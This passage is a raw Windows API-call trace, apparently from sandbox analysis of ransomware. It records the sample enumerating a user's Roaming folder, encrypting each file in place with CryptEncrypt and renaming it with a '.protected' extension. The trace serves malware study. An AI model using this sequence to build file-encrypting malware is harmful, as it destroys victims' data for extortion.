lpOverlapped=0x0) returned 1 [0089.791] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.792] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.792] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.792] CloseHandle (hObject=0xd4) returned 1 [0089.793] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lMoDm7a.bmp.protected") returned 71 [0089.793] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lMoDm7a.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lmodm7a.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lMoDm7a.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lmodm7a.bmp.protected")) returned 1 [0089.794] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.794] lstrcmpiW (lpString1="Lrk1qHpo08_IT3Y.wav", lpString2="Windows") returned -1 [0089.794] lstrcmpiW (lpString1="Lrk1qHpo08_IT3Y.wav", lpString2="Program Files") returned -1 [0089.794] lstrcmpiW (lpString1="Lrk1qHpo08_IT3Y.wav", lpString2="Program Files (x86)") returned -1 [0089.794] lstrcmpiW (lpString1="Lrk1qHpo08_IT3Y.wav", lpString2="$Recycle.bin") returned 1 [0089.794] lstrcmpiW (lpString1="Lrk1qHpo08_IT3Y.wav", lpString2="System Volume Information") returned -1 [0089.794] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Lrk1qHpo08_IT3Y.wav") returned 69 [0089.795] StrStrIW (lpFirst="Lrk1qHpo08_IT3Y.wav", lpSrch=".protected") returned 0x0 [0089.795] lstrcmpW (lpString1="Lrk1qHpo08_IT3Y.wav", lpString2="RESTORE_FILES.txt") returned -1 [0089.795] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.795] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Lrk1qHpo08_IT3Y.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lrk1qhpo08_it3y.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Lrk1qHpo08_IT3Y.wav") returned 69 [0089.795] StrStrW (lpFirst="Lrk1qHpo08_IT3Y.wav", lpSrch=".txt") returned 0x0 [0089.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Lrk1qHpo08_IT3Y.wav") returned 69 [0089.795] StrStrW (lpFirst="Lrk1qHpo08_IT3Y.wav", lpSrch=".rar") returned 0x0 [0089.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Lrk1qHpo08_IT3Y.wav") returned 69 [0089.795] StrStrW (lpFirst="Lrk1qHpo08_IT3Y.wav", lpSrch=".zip") returned 0x0 [0089.796] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.796] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.796] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.797] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.797] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.797] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.797] CloseHandle (hObject=0xd4) returned 1 [0089.798] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Lrk1qHpo08_IT3Y.wav.protected") returned 79 [0089.798] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Lrk1qHpo08_IT3Y.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lrk1qhpo08_it3y.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Lrk1qHpo08_IT3Y.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lrk1qhpo08_it3y.wav.protected")) returned 1 [0089.799] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.799] lstrcmpiW (lpString1="LWwzS7eC2c7 PDx.gif", lpString2="Windows") returned -1 [0089.799] lstrcmpiW (lpString1="LWwzS7eC2c7 PDx.gif", lpString2="Program Files") returned -1 [0089.799] lstrcmpiW (lpString1="LWwzS7eC2c7 PDx.gif", lpString2="Program Files (x86)") returned -1 [0089.799] lstrcmpiW (lpString1="LWwzS7eC2c7 PDx.gif", lpString2="$Recycle.bin") returned 1 [0089.799] lstrcmpiW (lpString1="LWwzS7eC2c7 PDx.gif", lpString2="System Volume Information") returned -1 [0089.799] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LWwzS7eC2c7 PDx.gif") returned 69 [0089.800] StrStrIW (lpFirst="LWwzS7eC2c7 PDx.gif", lpSrch=".protected") returned 0x0 [0089.800] lstrcmpW (lpString1="LWwzS7eC2c7 PDx.gif", lpString2="RESTORE_FILES.txt") returned -1 [0089.800] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.800] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LWwzS7eC2c7 PDx.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lwwzs7ec2c7 pdx.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.800] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LWwzS7eC2c7 PDx.gif") returned 69 [0089.800] StrStrW (lpFirst="LWwzS7eC2c7 PDx.gif", lpSrch=".txt") returned 0x0 [0089.800] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LWwzS7eC2c7 PDx.gif") returned 69 [0089.800] StrStrW (lpFirst="LWwzS7eC2c7 PDx.gif", lpSrch=".rar") returned 0x0 [0089.800] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LWwzS7eC2c7 PDx.gif") returned 69 [0089.800] StrStrW (lpFirst="LWwzS7eC2c7 PDx.gif", lpSrch=".zip") returned 0x0 [0089.801] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.802] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.802] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.803] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.803] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.803] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.803] CloseHandle (hObject=0xd4) returned 1 [0089.804] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LWwzS7eC2c7 PDx.gif.protected") returned 79 [0089.804] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LWwzS7eC2c7 PDx.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lwwzs7ec2c7 pdx.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LWwzS7eC2c7 PDx.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lwwzs7ec2c7 pdx.gif.protected")) returned 1 [0089.805] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.805] lstrcmpiW (lpString1="l_2UP2Jf.gif", lpString2="Windows") returned -1 [0089.805] lstrcmpiW (lpString1="l_2UP2Jf.gif", lpString2="Program Files") returned -1 [0089.805] lstrcmpiW (lpString1="l_2UP2Jf.gif", lpString2="Program Files (x86)") returned -1 [0089.805] lstrcmpiW (lpString1="l_2UP2Jf.gif", lpString2="$Recycle.bin") returned 1 [0089.805] lstrcmpiW (lpString1="l_2UP2Jf.gif", lpString2="System Volume Information") returned -1 [0089.805] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l_2UP2Jf.gif") returned 62 [0089.805] StrStrIW (lpFirst="l_2UP2Jf.gif", lpSrch=".protected") returned 0x0 [0089.805] lstrcmpW (lpString1="l_2UP2Jf.gif", lpString2="RESTORE_FILES.txt") returned -1 [0089.805] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.805] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l_2UP2Jf.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\l_2up2jf.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l_2UP2Jf.gif") returned 62 [0089.806] StrStrW (lpFirst="l_2UP2Jf.gif", lpSrch=".txt") returned 0x0 [0089.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l_2UP2Jf.gif") returned 62 [0089.806] StrStrW (lpFirst="l_2UP2Jf.gif", lpSrch=".rar") returned 0x0 [0089.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l_2UP2Jf.gif") returned 62 [0089.806] StrStrW (lpFirst="l_2UP2Jf.gif", lpSrch=".zip") returned 0x0 [0089.806] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.807] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.807] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.808] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.808] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.808] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.808] CloseHandle (hObject=0xd4) returned 1 [0089.809] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l_2UP2Jf.gif.protected") returned 72 [0089.809] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l_2UP2Jf.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\l_2up2jf.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l_2UP2Jf.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\l_2up2jf.gif.protected")) returned 1 [0089.811] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.811] lstrcmpiW (lpString1="Macromedia", lpString2="Windows") returned -1 [0089.811] lstrcmpiW (lpString1="Macromedia", lpString2="Program Files") returned -1 [0089.811] lstrcmpiW (lpString1="Macromedia", lpString2="Program Files (x86)") returned -1 [0089.811] lstrcmpiW (lpString1="Macromedia", lpString2="$Recycle.bin") returned 1 [0089.811] lstrcmpiW (lpString1="Macromedia", lpString2="System Volume Information") returned -1 [0089.811] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia") returned 60 [0089.811] lstrcmpW (lpString1="Macromedia", lpString2=".") returned 1 [0089.811] lstrcmpW (lpString1="Macromedia", lpString2="..") returned 1 [0089.811] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\*") returned 62 [0089.811] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0089.811] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.811] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.811] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.811] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.811] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.811] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\.") returned 62 [0089.811] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.811] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.812] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.812] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.812] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.812] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.812] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.812] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\..") returned 63 [0089.812] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.812] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.812] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.812] lstrcmpiW (lpString1="Flash Player", lpString2="Windows") returned -1 [0089.812] lstrcmpiW (lpString1="Flash Player", lpString2="Program Files") returned -1 [0089.812] lstrcmpiW (lpString1="Flash Player", lpString2="Program Files (x86)") returned -1 [0089.812] lstrcmpiW (lpString1="Flash Player", lpString2="$Recycle.bin") returned 1 [0089.812] lstrcmpiW (lpString1="Flash Player", lpString2="System Volume Information") returned -1 [0089.812] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player") returned 73 [0089.812] lstrcmpW (lpString1="Flash Player", lpString2=".") returned 1 [0089.812] lstrcmpW (lpString1="Flash Player", lpString2="..") returned 1 [0089.812] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\*") returned 75 [0089.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.812] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.812] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.812] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.812] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.812] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.813] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\.") returned 75 [0089.813] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.813] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.813] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.813] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.813] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.813] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.813] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.813] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\..") returned 76 [0089.813] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.813] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.813] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.813] lstrcmpiW (lpString1="#SharedObjects", lpString2="Windows") returned -1 [0089.813] lstrcmpiW (lpString1="#SharedObjects", lpString2="Program Files") returned -1 [0089.813] lstrcmpiW (lpString1="#SharedObjects", lpString2="Program Files (x86)") returned -1 [0089.813] lstrcmpiW (lpString1="#SharedObjects", lpString2="$Recycle.bin") returned -1 [0089.813] lstrcmpiW (lpString1="#SharedObjects", lpString2="System Volume Information") returned -1 [0089.813] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects") returned 88 [0089.813] lstrcmpW (lpString1="#SharedObjects", lpString2=".") returned -1 [0089.813] lstrcmpW (lpString1="#SharedObjects", lpString2="..") returned -1 [0089.813] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*") returned 90 [0089.813] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.814] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.814] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.814] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.814] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.814] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.814] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\.") returned 90 [0089.814] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.814] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.815] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.815] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.815] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.815] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.815] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.815] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\..") returned 91 [0089.815] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.815] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.815] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.815] lstrcmpiW (lpString1="P7Y3F7QB", lpString2="Windows") returned -1 [0089.815] lstrcmpiW (lpString1="P7Y3F7QB", lpString2="Program Files") returned -1 [0089.815] lstrcmpiW (lpString1="P7Y3F7QB", lpString2="Program Files (x86)") returned -1 [0089.815] lstrcmpiW (lpString1="P7Y3F7QB", lpString2="$Recycle.bin") returned 1 [0089.815] lstrcmpiW (lpString1="P7Y3F7QB", lpString2="System Volume Information") returned -1 [0089.815] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB") returned 97 [0089.815] lstrcmpW (lpString1="P7Y3F7QB", lpString2=".") returned 1 [0089.815] lstrcmpW (lpString1="P7Y3F7QB", lpString2="..") returned 1 [0089.816] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\*") returned 99 [0089.816] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.816] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.816] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.816] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.816] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.816] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.816] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\P7Y3F7QB\\.") returned 99 [0089.816] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.816] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.817] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.817] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.817] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.817] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.817] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.817] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash 